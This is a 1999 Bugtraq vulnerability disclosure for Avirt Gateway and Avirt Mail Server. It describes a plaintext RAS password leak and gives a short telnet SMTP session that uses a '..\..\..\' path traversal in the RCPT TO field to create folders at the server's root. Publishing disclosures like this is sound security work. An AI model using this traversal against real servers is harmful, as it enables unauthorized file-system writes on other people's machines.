Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer

From: Jesús López de Aguileta (aguiletaat_private)
Date: Tue Nov 02 1999 - 07:12:41 PST

    ----- Original Message -----
    From: Luciano Martins <luckat_private>
    To: <BUGTRAQat_private>
    Sent: Monday, November 01, 1999 9:57 AM
    Subject: Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow
    vulnerability

    > Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow
    > vulnerability

    I post another 2 bugs concerning Avirt Gateway and Avirt Mail Server 3.3 and
    3.5 in BUGTRAQ-ES a month ago. I will try (excuse my poor English) to
    translate this message here.

    1) Anybody with console access could retrieve RAS password in Avirt Gateway.

    Changing the username in "Internet connection" properties and pressing
    "test" button makes Avirt to present a message box  with the password in
    plaintext.

    2) Anybody on the Intranet could make directories anywhere in the NT running
    Avirt Mail Server.

    telnet 192.168.0.1 25

    > 220 server aVirt Mail SMTP Server Ready.
     mail from:foo
    > 250 foo, Sender OK
     rcpt to:..\..\..\..\newfolder
    > 250 ..\..\..\..\newfolder, Receipient OK
     data
    > 354 Please enter mail, ending with a "." on a line by itself
     Textinside
     .
    > 250 Mail accepted.

    This will create a root folder named "newfolder" with a file inside it.
    Fortunately it appears to be impossible to overwrite an existing directory.

    Avirt has been notified about this security flaws on 23/8/99

    Regards

    Jesús López de Aguileta
    EunateNet